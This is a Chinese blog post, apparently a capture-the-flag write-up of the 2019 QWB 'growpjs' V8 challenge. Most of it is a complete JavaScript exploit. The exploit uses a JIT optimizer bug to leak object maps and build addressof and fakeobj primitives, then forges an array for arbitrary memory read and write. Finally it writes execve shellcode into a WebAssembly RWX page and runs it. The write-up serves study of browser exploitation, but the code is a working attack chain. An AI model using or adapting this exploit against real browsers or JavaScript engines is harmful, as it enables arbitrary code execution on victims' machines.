2019QWB growpjs

于 2023-12-20 23:01:08 发布
阅读量479 收藏 9
点赞数 10
分类专栏: 集训日记 PWN 文章标签: javascript pwn 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46483787/article/details/135103924
版权

第一次知道原来各种map也是申请的一段连续的内存空间来存储,所以必要的时候可以通过固定偏移来从一种map获取到另一种map。但是要注意这里的获取的时候要保证对象不被释放。

这也是做的第一道涉及优化器的题目,收货很多

class Memory{
	constructor(){
		this.buf = new ArrayBuffer(8);
		this.f64 = new Float64Array(this.buf);
		this.u32 = new Uint32Array(this.buf);
		this.bytes = new Uint8Array(this.buf);
	}
	d2u(val){				//double ==> Uint64
		this.f64[0] = val;
		let tmp = Array.from(this.u32);
		return tmp[1] * 0x100000000 + tmp[0];
	}
	u2d(val){				//Uint64 ==> double
		let tmp = [];
		tmp[0] = parseInt(val % 0x100000000);
		tmp[1] = parseInt((val - tmp[0]) / 0x100000000);
		this.u32.set(tmp);
		return this.f64[0];
	}
}
function hex(i)
{
    return i.toString(16).padStart(16, "0");
}
var store=[];
var mem=new Memory();
function readmap_()
{
	var map_obj=[1.1,2.2,3.3];
	var map_tmp={x:3};
	return [map_obj[map_tmp.x],map_obj,map_tmp];
}
function readmap()
{
	for(let i=0;i<12000;i++)readmap_();
	return readmap_()[0];
}
var float_map=mem.d2u(readmap());
var obj_map=float_map+0xa0;
console.log("[*] float_map is 0x"+hex(float_map));
console.log("[*] obj_map is 0x"+hex(obj_map));
var float_mapp=mem.u2d(float_map);
var obj_mapp=mem.u2d(obj_map);

function fakeobj_(address)
{
	var arr_1=[address,address,address];
	var tmp_1={x:3};
	arr_1[tmp_1.x]=obj_mapp;
	return  arr_1;
}
function fakeobj(address)
{
	for(let i=0;i<12000;i++)
	{
		var tmp=fakeobj_(address);
	}
	return tmp[0];
}
var float_obj=fakeobj(float_mapp);
function addressof_(object)
{
	var arr_2=[object,object,object];
	var tmp_2={x:3};
	arr_2[tmp_2.x]=float_obj;
	return arr_2;
}
function addressof(object)
{
	for(let i=0;i<12000;i++)
	{
		var tmp=addressof_(object);
	}
	return tmp[0];
}
var objt={'a':1};
var arbf=new ArrayBuffer(0x1234);
var obj={'a':mem.u2d(0x5678)};
var fakeArray=[
	float_mapp,
	mem.u2d(0),
	mem.u2d(0),
	mem.u2d(0x100000000000),
	1.1,
	2.2
].slice(0);
var fakeArrayaddr=mem.d2u(addressof(fakeArray));
fakeArray[2]=mem.u2d(fakeArrayaddr);
var victim=fakeobj(mem.u2d(fakeArrayaddr+0x190));
console.log("[*] fakeArrayaddr is "+hex(fakeArrayaddr));
//console.log("[*] victim length is 0x"+hex(victim.length));
var buf_idx=0;
var obj_idx=0;
var max_idx=0x300;
for(let i=0;i<max_idx;i++)
{
	let t=mem.d2u(victim[i]);
	if(t==0x1234)buf_idx=i+1;
	if(t==0x5678)obj_idx=i;
}
class ArbitraryRW
{
	addressof(newobj)
	{
		obj.a=newobj;
		return mem.d2u(victim[obj_idx]);
	}
	read64(address)
	{
		victim[buf_idx]=mem.u2d(address);
		var dt=new DataView(arbf);
		return mem.d2u(dt.getFloat64(0,true));
	}
}
var arw=new ArbitraryRW();
var objarray=[objt,objt];
var objaddr=arw.addressof(objt);
console.log("[*] objaddr is 0x"+hex(objaddr));
console.log("[*] buf_idx is 0x"+hex(buf_idx));
console.log("[*] obj_idx is 0x"+hex(obj_idx));
var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);

var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule, {});
let wasmFunc = wasmInstance.exports.main;
var inst_addr=arw.addressof(wasmInstance);
var rwx_addr=arw.read64(inst_addr+0x88-1);
console.log("[*] inst_addr is 0x"+hex(inst_addr));
console.log("[*] rwx_addr is 0x"+hex(rwx_addr));

//write shellcode to the rwx address
victim[buf_idx]=mem.u2d(rwx_addr);
var dt=new DataView(arbf);
const shellcode = new Uint8Array([0x6a,0x3b,0x58,0x99,0x48,0xbb,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x53,0x48,0x89,0xe7,0x68,0x2d,0x63,0x00,0x00,0x48,0x89,0xe6,0x52,0xe8,0x1c,0x00,0x00,0x00,0x44,0x49,0x53,0x50,0x4c,0x41,0x59,0x3d,0x3a,0x30,0x20,0x67,0x6e,0x6f,0x6d,0x65,0x2d,0x63,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72,0x00,0x56,0x57,0x48,0x89,0xe6,0x0f,0x05]);
for (var i=0;i<shellcode.length;i++) {
	dt.setUint8(i,shellcode[i], true);
}
wasmFunc();
Ayakaaaa
关注
  • 10
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2019QWB-CRYPTO-babysampling
zippo1234的博客
10-27 282
2019QWB-CRYPTO-babysamplingbabysampling题目分析开始1.题目2.分析过程(1)加密过程分析(2)理论可能3.脚本4.get flag结语 每天一题,只能多不能少 babysampling 题目分析 lsfr Berlekamp-Massey算法 开始 1.题目 import hashlib import secret flag=secret.flag assert flag.startswith("flag{") assert flag.endswith("}")
反序列化(强网杯2019—UPLOAD)
kid的博客
05-29 5935
反序列化(强网杯2019—UPLOAD) 前言 这里主要是复现一下强网杯2019web的第一题,UPLOAD。这是一道反序列化的题,反正我觉得挺难的,当时已经锁定了反序列化的方向也没能完成… 感谢大佬提供的复现环境:https://github.com/CTFTraining/qwb_2019_upload UPLOAD 进入靶场后首先是一个登陆注册页面 这里很自然的要想到有没有注入,简单的万能...
CTF中的AEG(四) 2019 QWB babyaeg
yongbaoii的博客
04-18 353
@
SQL注入之堆叠注入/预处理/handler-[强网杯 2019]随便注 1
小龙在线
09-15 1821
介绍 所谓堆叠注入,就是把多条完整的SQL语句用分号;分隔开,而不是用union或union all连接起来。 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用
qwb2019_one(strchr的误用)
seaaseesa的博客
06-11 582
qwb2019_one(strchr的误用) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,test功能里abs函数存在溢出,由此可以造成下标越界,进而可以泄露程序的地址。 在edit功能里,strchr可以返回字符串结尾的’\0’的位置,因此可以造成off bu one,我们每一次进行off by one将结尾的\0改掉,这样,我们就可以一步一步的逼近下一个chunk的size处,进而可以修改size 我们可以通过控制size,然后伪造chunk,进行unlink操作,然后
Matplotlib.zip_QWB_dssz_matplotlib
07-14
Matplotlib的官方文档,开发必备,强烈推荐
强网杯2019(高明的黑客&强网先锋上单)
kid的博客
05-30 5605
强网杯2019(高明的黑客&强网先锋上单)   前言 这里主要是对强网杯web中高明的黑客和上单两道题进行一个复现回顾 再次感谢大佬提供的场景复现:https://www.zhaoj.in/read-5873.html   高明的黑客 题目是先下载给出代码 比赛时拿到这道题一下就被打懵了 3000多个文件,打开还是奇奇怪怪得文件内容 当时是真不知道,怎么做 OK现在...
2019强网杯部分writeup
Sea_Sand息禅
06-04 5582
Web 1、UPLOAD 复现环境https://github.com/CTFTraining/qwb_2019_upload 先看一下网站情况: 是一个注册可登录的界面,登陆之后可以上传图片,一个账号只能上传一次。 扫一下后台目录,发现upload是泄露的,www.tar.gz是泄露的。 www.tar.gz下载下来是网站的源码,upload则是我们上传的文件,找到上传文件的源码: &lt...
2022 TQLCTF unbelievable_write
weixin_46483787的博客
02-23 4248
有个非预期解是打got表,使题目难度降低了很多,如果开了got不可写的话可以用largebin attack或者其他高版本libc任意地址写来做 这里放我自己用的largebin attack的方法: from re import L from pwn import * from ctypes import * from string import * from hashlib import * from itertools import product #context.log_level = 'debu
2022 TQLCTF ezvm
weixin_46483787的博客
02-24 3608
这道题使用了unicorn引擎来对输入的shellcode进行模拟,我们可以直接通过unicorn的文档来查看程序中涉及到的函数的作用和调用方式。 程序分析 首先来对程序的整体功能进行一个简要的分析: 其中一些函数的名字经过了修改,其中INIT函数作用是开沙箱 然后读入32位shellcode 接下来是一系列的unicorn引擎中的函数,我们根据unicorn的用户手册简要介绍一下: uc_open:创建新的Unicorn实例,这里只需要知道是32位x86架构即可 uc_mem_map:从名字和参数也能看出
2021 湖湘杯 tiny_httpd
weixin_46483787的博客
04-07 2910
这个题目给出了源码,就不逆向了 程序实现了一个小型的web服务器,漏洞点如下: 在进行路径过滤的时候不是很严格,将··替换成·,但是如果输入···,则仍然有··的效果,所以可以做一个路径穿越 然后关注一下cgi这个变量: 当cgi为0的时候是访问文件,为1的时候则是命令执行 只有传参传的是GET或者POST时,cgi才会为1,首先想的是能不能利用路径穿越直接读取根目录下的flag 于是跟进serve_file函数 但是发现文件名filename是写死进去的,所以这个思路走不通,另一条路是利用路径穿越执
fastbin reverse into tcache
weixin_46483787的博客
02-10 2682
前言 一种任意地址写的方法 整体思路 这种方式可以在允许修改fd的情况下,仅利用fastbin范围内的chunk实现一个任意地址写 代码调试 #include <stdio.h> #include <stdlib.h> #include <string.h> #include <assert.h> const size_t allocsize = 0x40; int main(){ setbuf(stdout, NULL); char* ptrs[14
2022 CISCN 初赛pwn完整wp
weixin_46483787的博客
06-09 2226
2022 CISCN 初赛pwn的完整wp
house of Emma
weixin_46483787的博客
02-08 2156
前言 鸽了好久总算来复现了,由于从libc2.34开始,取消了两个常用的hook,这给我们的攻击带来了很大的困难,于是wjh找到了一种新的攻击方式,这是一种基于一条适用于 GLIBC 2.34 及以下所有版本的 IO_File 调用链进行攻击的手法。 前置知识 (一)largebin attack 见我的另一篇文章:house of pig 攻击手法详解 (二)house of kiwi 当程序没有显示调用exit,也不会通过主函数返回,那么以往我们使用的FSOP就无法进行了,如果此时两个hook也没法利用
2022 VNCTF easyROPtocol
weixin_46483787的博客
04-09 1801
一道协议逆向+orwROP的题,基本上难度在于给出符合要求的协议头和校验和 拿到题目: 在打印的信息中我们可以获取到,这个程序是TCP protocol的C语言实现 于是先把TCP的头部结构拿过来: 首先进add函数里看看: 可以看到能够申请最多4个chunk,每个chunk最多0x1000 生成之后要通过check_head函数和check_sum的检测 首先看check_head: 从这里可以得到确定一些头部信息,如源端口和目的端口,还有urgent_ptr必须为0,等,还有一些属性只能缩小范围,
house of pig 攻击手法详解
weixin_46483787的博客
02-03 1580
在这里学习一下学长提出来的一种攻击手段,适用与libc-2.31及以上版本,本质上是通过 libc2.31 下的 largebin attack以及 FILE 结构利用,来配合 libc2.31 下的 tcache stashing unlink attack 进行组合利用的方法。主要适用于程序中仅有 calloc 函数来申请 chunk,而没有调用 malloc 函数的情况。
2022 TQLCTF nemu
weixin_46483787的博客
03-02 1345
nemu是一个南京大学的调试器项目,想了解更多可以去github上看看: https://github.com/NJU-ProjectN/nemu 我们首先把程序运行起来看看: 通过help可以看到程序实际上是实现了一个简单的debugger功能,里面内置了一段简短的汇编代码,那么接下来我们将目光放到help中出现的这几个函数上即可 这里直接给出结论,x指令在读的时候没有检查地址,从而导致了越界读,set存在一个越界写,而本题got表可改,且没开PIE 先来分析一下程序运行过程: 首先是读入命令,根据读入
CTF V8 pwn入门(一)
最新发布
weixin_46483787的博客
12-12 1159
仍然是因为某些原因,需要学学浏览器pwn
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值